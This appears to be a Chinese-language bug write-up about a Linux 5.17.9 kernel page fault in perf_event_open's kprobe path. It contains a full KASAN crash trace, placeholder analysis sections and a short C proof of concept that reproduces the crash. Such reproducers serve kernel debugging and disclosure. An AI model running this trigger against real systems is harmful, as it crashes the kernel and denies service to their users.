Single

Linux Kernel: perf_event_open 访问地址错误

Crash Report

BUG: unable to handle page fault for address: fffffbfff3d06000
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 123fee067 P4D 123fee067 PUD 123fb2067 PMD 123f30067 PTE 0
Oops: 0000 [#1] PREEMPT SMP KASAN NOPTI
CPU: 0 PID: 20950 Comm: syz-executor.0 Not tainted 5.17.9 #5
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:insn_get_prefixes.part.0+0xa8/0x1180
Code: 49 be 00 00 00 00 00 fc ff df 48 8b 40 60 48 89 44 24 08 e9 81 00 00 00 e8 45 7d 44 ff 4c 89 fa 4c 89 f9 48 c1 ea 03 83 e1 07 <42> 0f b6 14 32 38 ca 7f 08 84 d2 0f 85 ad 0f 00 00 48 89 d8 48 89
RSP: 0018:ffff88810558f910 EFLAGS: 00010246
RAX: 0000000000040000 RBX: ffffffff9cda27a0 RCX: 0000000000000000
RDX: 1ffffffff3d06000 RSI: ffffc90000281000 RDI: ffff88810558fa98
RBP: ffffffff9e830001 R08: 0000000000000001 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000001 R12: 0000000000000001
R13: ffffffff9e830000 R14: dffffc0000000000 R15: ffffffff9e830000
FS:  00007f6011223700(0000) GS:ffff88811b200000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: fffffbfff3d06000 CR3: 0000000103fca005 CR4: 0000000000770ef0
DR0: 0000000000000000 DR1: 0000000020000080 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000600
PKRU: 55555554
Call Trace:
  <TASK>
 insn_get_modrm+0x646/0x7c0
 insn_get_sib+0x296/0x330
 insn_get_displacement+0x346/0x6c0
 insn_decode+0x597/0x650
 can_probe+0xfc/0x1c0
 arch_prepare_kprobe+0x79/0x1c0
 register_kprobe+0x9f1/0x1540
 __register_trace_kprobe+0x262/0x2d0
 create_local_trace_kprobe+0x1e6/0x3b0
 perf_kprobe_init+0x18c/0x280
 perf_kprobe_event_init+0xf8/0x1c0
 perf_try_init_event+0x12d/0x570
 perf_event_alloc.part.0+0xf54/0x2da0
 __do_sys_perf_event_open+0x4a7/0x2bc0
 do_syscall_64+0x38/0x90
 entry_SYSCALL_64_after_hwframe+0x44/0xae
RIP: 0033:0x7f60120ad119
Code: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f6011223168 EFLAGS: 00000246 ORIG_RAX: 000000000000012a
RAX: ffffffffffffffda RBX: 00007f60121bff60 RCX: 00007f60120ad119
RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000020000080
RBP: 00007f601210708d R08: 0000000000000000 R09: 0000000000000000
R10: ffffffffffffffff R11: 0000000000000246 R12: 0000000000000000
R13: 00007ffff4d24c5f R14: 00007f6011223300 R15: 0000000000022000
 </TASK>
Modules linked in:
CR2: fffffbfff3d06000
---[ end trace 0000000000000000 ]---
RIP: 0010:insn_get_prefixes.part.0+0xa8/0x1180
Code: 49 be 00 00 00 00 00 fc ff df 48 8b 40 60 48 89 44 24 08 e9 81 00 00 00 e8 45 7d 44 ff 4c 89 fa 4c 89 f9 48 c1 ea 03 83 e1 07 <42> 0f b6 14 32 38 ca 7f 08 84 d2 0f 85 ad 0f 00 00 48 89 d8 48 89
RSP: 0018:ffff88810558f910 EFLAGS: 00010246
RAX: 0000000000040000 RBX: ffffffff9cda27a0 RCX: 0000000000000000
RDX: 1ffffffff3d06000 RSI: ffffc90000281000 RDI: ffff88810558fa98
RBP: ffffffff9e830001 R08: 0000000000000001 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000001 R12: 0000000000000001
R13: ffffffff9e830000 R14: dffffc0000000000 R15: ffffffff9e830000
FS:  00007f6011223700(0000) GS:ffff88811b200000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: fffffbfff3d06000 CR3: 0000000103fca005 CR4: 0000000000770ef0
DR0: 0000000000000000 DR1: 0000000020000080 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000600
PKRU: 55555554

函数调用链

在做了在做了

漏洞分析

在做了在做了

Poc

#include <stdio.h>
#include <fcntl.h>
#include <poll.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <assert.h>
#include <signal.h>
#include <unistd.h>
#include <syscall.h>
#include <pthread.h>
#include <sys/types.h>
#include <linux/fuse.h>
#include <linux/sched.h>
#include <sys/mman.h>
#include <sys/shm.h>
#include <linux/perf_event.h> int main() { struct perf_event_attr *attr; attr = malloc(sizeof(struct perf_event_attr)); attr->type = 0x6; attr->size = 0x80; attr->__reserved_1 = 0x4; attr->kprobe_addr = 0xffffffffff600000; uint64_t ret = syscall(__NR_perf_event_open, attr, 0, 0, -1, 0); }

暂无评论

发表评论